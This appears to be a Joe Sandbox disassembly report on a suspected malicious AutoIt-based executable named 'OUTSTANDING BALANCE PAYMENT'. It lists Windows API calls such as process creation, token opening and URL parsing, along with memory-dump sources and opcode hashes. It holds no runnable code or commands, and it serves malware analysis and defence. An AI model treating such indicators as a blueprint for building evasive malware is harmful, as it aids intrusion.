                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                          • String ID:
                                                          • API String ID: 1687444384-0
                                                          • Opcode ID: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                          • Instruction ID: 9f20b1c94d89d781968bf15b2f46de333242ee6072fba21794a3900796bd9adb
                                                          • Opcode Fuzzy Hash: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                          • Instruction Fuzzy Hash: C3016D71445B00DFD721EF75D90674AB7F0EF40325F20898EA49A972B0CFB0A680CB55
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BCE33D
                                                          • _memset.LIBCMT ref: 00BCE34C
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C23D00,00C23D44), ref: 00BCE37B
                                                          • CloseHandle.KERNEL32 ref: 00BCE38D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                          • Instruction ID: d8157af3c08d6dd9344dbbea2b7fcd31dc1a9c8fe81d3fa290bc8f37d51cbf42
                                                          • Opcode Fuzzy Hash: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                          • Instruction Fuzzy Hash: B5F089F1670394BEE7102760AC45F7B7E9CD704754F004421FF04DA5A2DBB99D0187A8
                                                          APIs
                                                            • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                            • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                            • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
                                                            • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEA8E
                                                          • LineTo.GDI32(00000000,?,?), ref: 00BCEA9B
                                                          • EndPath.GDI32(00000000), ref: 00BCEAAB
                                                          • StrokePath.GDI32(00000000), ref: 00BCEAB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 6da45febda1f199124bc984536af692dc6a39d448e5d8fbe3d53da88f07e10bf
                                                          • Instruction ID: 4af87b1aa0371b2c5c38fb714b32a6c78d523d9e519292f01c83623afc7d5b38
                                                          • Opcode Fuzzy Hash: 6da45febda1f199124bc984536af692dc6a39d448e5d8fbe3d53da88f07e10bf
                                                          • Instruction Fuzzy Hash: 20F08231005299BBDB229F94AC0DFCE3F59AF1A321F084145FE116A0E2CBB59552DB95
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B9C864
                                                          • AttachThreadInput.USER32(00000000), ref: 00B9C86B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 883c2dadc5bf0fe347218d4bf9da9dbc79f3ddb822556142f57e682f154137e4
                                                          • Instruction ID: 551dc96e829080855f2f9efcd3313ef113d03f62367cd87db68a486f472550de
                                                          • Opcode Fuzzy Hash: 883c2dadc5bf0fe347218d4bf9da9dbc79f3ddb822556142f57e682f154137e4
                                                          • Instruction Fuzzy Hash: 4FE065711412A47BDF101F61DC8DEDB7F5CEF067A1F008061B60D99460DAB1C981C7E0
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00B9B0D6
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0DD
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B9AC9D), ref: 00B9B0EA
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0F1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 9202beab85d50fdb36779cf9f1778430806a2b372214c9adcfd87ab5a8b362dd
                                                          • Instruction ID: a9dc10fa2ef6bfefb8d81dd9c5a0138c3c22bb578a13c92e1df9bd74e71015f7
                                                          • Opcode Fuzzy Hash: 9202beab85d50fdb36779cf9f1778430806a2b372214c9adcfd87ab5a8b362dd
                                                          • Instruction Fuzzy Hash: E9E086326012119BDB201FB16D4CF473BE8EF55792F118868F241DF040DFB48401C761
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00B7B496
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00B7B4A0
                                                          • SetBkMode.GDI32(?,00000001), ref: 00B7B4B5
                                                          • GetStockObject.GDI32(00000005), ref: 00B7B4BD
                                                          • GetWindowDC.USER32(?,00000000), ref: 00BDDE2B
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BDDE38
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00BDDE51
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00BDDE6A
                                                          • GetPixel.GDI32(00000000,?,?), ref: 00BDDE8A
                                                          • ReleaseDC.USER32(?,00000000), ref: 00BDDE95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 09305545c95a75c72d28613aa916ade70fbb39f4383eba912f25f1ccec364c6d
                                                          • Instruction ID: da33c9c901288a193cd812fcb45b2560785a7f715a9ad88422f1288730cd5c0d
                                                          • Opcode Fuzzy Hash: 09305545c95a75c72d28613aa916ade70fbb39f4383eba912f25f1ccec364c6d
                                                          • Instruction Fuzzy Hash: 77E0ED31100280AFDF215F64AC49BD87B51EB51335F14C66AF6BA6D0E1DBB24981DB12
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 466cf7cbd9bc95998541e49fcf4cb38b4a84a51c566c3b7b1a01807f27ae9398
                                                          • Instruction ID: 7e1ad7f99641c54380d69534f452a2317db8a15ff3cabfec1af264dd8cdf4926
                                                          • Opcode Fuzzy Hash: 466cf7cbd9bc95998541e49fcf4cb38b4a84a51c566c3b7b1a01807f27ae9398
                                                          • Instruction Fuzzy Hash: 96E012B1100244EFEB015F708888A2EBBE8EF4C350F12C80AF96E8B211DEB598408B40
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B9B2DF
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00B9B2EB
                                                          • CloseHandle.KERNEL32(?), ref: 00B9B2F4
                                                          • CloseHandle.KERNEL32(?), ref: 00B9B2FC
                                                            • Part of subcall function 00B9AB24: GetProcessHeap.KERNEL32(00000000,?,00B9A848), ref: 00B9AB2B
                                                            • Part of subcall function 00B9AB24: HeapFree.KERNEL32(00000000), ref: 00B9AB32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: ef637cf2720e7596642d98e928a62df7570db7d1c9a8853a3adb758226a224cc
                                                          • Instruction ID: d51ec79f4e02a477cadcd3c8ea366765de745e356e6fd0cb9248f2ef410363a4
                                                          • Opcode Fuzzy Hash: ef637cf2720e7596642d98e928a62df7570db7d1c9a8853a3adb758226a224cc
                                                          • Instruction Fuzzy Hash: F2E0B63A104045BBCB012BA5EC48859FBA6FF983213108621F62686575CF73A871EB95
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 5f2d3f0ab009080d38d353711f0013d312a7106d19fed5da5b71c17d43ba3a25
                                                          • Instruction ID: 98d99b7bf2f557692f414d7a193e9b1e736bb141fd57699ab18fa388b8ec549d
                                                          • Opcode Fuzzy Hash: 5f2d3f0ab009080d38d353711f0013d312a7106d19fed5da5b71c17d43ba3a25
                                                          • Instruction Fuzzy Hash: A2E046B1500240EFDB015F70C88862D7BE8EF4C390F11C809F96E8B211CFBA99008B00
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B9DEAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: 47059b4fe639dce2a493f804c5c1067a00a6dec0820630e96028e1f4ef0441b3
                                                          • Instruction ID: d00a6a9a3c28a92c893123ed67a245a67db4f3b0f742bdc14cf77d31e2052d97
                                                          • Opcode Fuzzy Hash: 47059b4fe639dce2a493f804c5c1067a00a6dec0820630e96028e1f4ef0441b3
                                                          • Instruction Fuzzy Hash: 81913574600601AFDF14DF65C885B6ABBF9FF49710B2084ADF94ACB691DBB0E841CB60
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00B7BCDA
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00B7BCF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 17d8bd06c5403b0a859f4f6cac030867cd67b6b45e32acb699327570b0b207f4
                                                          • Instruction ID: 5a08409f7f92257b3cfc5c7400361b022bb4203f8233389bcdebf066f3d496c8
                                                          • Opcode Fuzzy Hash: 17d8bd06c5403b0a859f4f6cac030867cd67b6b45e32acb699327570b0b207f4
                                                          • Instruction Fuzzy Hash: D35127714087449BE320AF24DC86BAFBBE8FF95354F41889EF6D8410A6DF7085A88756
                                                          APIs
                                                            • Part of subcall function 00B644ED: __fread_nolock.LIBCMT ref: 00B6450B
                                                          • _wcscmp.LIBCMT ref: 00BAC65D
                                                          • _wcscmp.LIBCMT ref: 00BAC670
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                          • Instruction ID: 7ba15900f76a225c7bdc9b35868065f1694869d18b2dc71da8e20a6ac3d04883
                                                          • Opcode Fuzzy Hash: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                          • Instruction Fuzzy Hash: F841A772A0420A7BDF11EAA4DC42FEF7BF9EF4A714F0004A9F515A7181DB759A04C751
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BCA85A
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BCA86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                          • Instruction ID: c3d8b2546cb517dc6af670bb23bd43466a086a64d8f9139de9ed45a35ec95ce9
                                                          • Opcode Fuzzy Hash: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                          • Instruction Fuzzy Hash: 7E41E574E012099FDB14CF68D881FDABBF9FB08304F1441AAE905AB781D770A942CFA1
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BB5190
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00BB51C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                          • Instruction ID: b0b72e062d2f6d421c67c9fb5557d7ed4b9aafaefda0b696c484f2fe1c1d0c3a
                                                          • Opcode Fuzzy Hash: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                          • Instruction Fuzzy Hash: 5A313B71C01119ABCF11EFA4CC85AEEBFB9FF14740F004095F815A6166DB75A946CBA0
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00BC980E
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BC984A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 351761df3413d5e2e280a21953ffe91cac555016de6b08c5053f6eff279dcc5b
                                                          • Instruction ID: f4a7d9d4213ef8265b51b307fb722376dc4b546b1d7b38ce2a38646a757d393f
                                                          • Opcode Fuzzy Hash: 351761df3413d5e2e280a21953ffe91cac555016de6b08c5053f6eff279dcc5b
                                                          • Instruction Fuzzy Hash: AC316A71110604AEEB109F68CC85FBB73E9FF59760F00865DF9A9D7190DA31AC81D760
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA51C6
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BA5201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 7e2b40bfde82861d8b30a4ade71c817d99e1a39410fcd388a36f7567e2b77e58
                                                          • Instruction ID: 5301bbdf81168545c6bdb0ec315b99e5a3299112632a3c99999435a3ae6e1667
                                                          • Opcode Fuzzy Hash: 7e2b40bfde82861d8b30a4ade71c817d99e1a39410fcd388a36f7567e2b77e58
                                                          • Instruction Fuzzy Hash: E031E471608705EFEB34CF99D885BAEBBF4EF86350F1440A9E985A61A0D7749B44CB10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 2391506597-2584243854
                                                          • Opcode ID: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                          • Instruction ID: 1f4bd8c21acc0f972a280cd8739daa15dacab767a539ebe6d04727e53115ee30
                                                          • Opcode Fuzzy Hash: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                          • Instruction Fuzzy Hash: 27215E71600219ABCF24EF64C882AFD77F4AF46744F0004A9F505AB152DBB8EE55DBA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BC945C
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC9467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
